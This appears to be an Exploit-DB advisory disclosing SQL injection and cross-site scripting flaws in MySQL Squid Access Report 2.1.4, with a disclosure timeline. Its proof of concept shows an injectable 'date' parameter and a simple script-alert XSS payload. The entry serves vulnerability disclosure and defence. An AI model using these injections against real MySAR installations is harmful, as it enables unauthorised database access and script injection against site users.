MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting

EDB-ID:

44483

CVE:

N/A

EDB Verified:

Author:

Keerati T.

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2018-04-18

Vulnerable App:

# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux

1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.

2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>

3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.

Tags: SQL Injection (SQLi) Cross-Site Scripting (XSS)

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services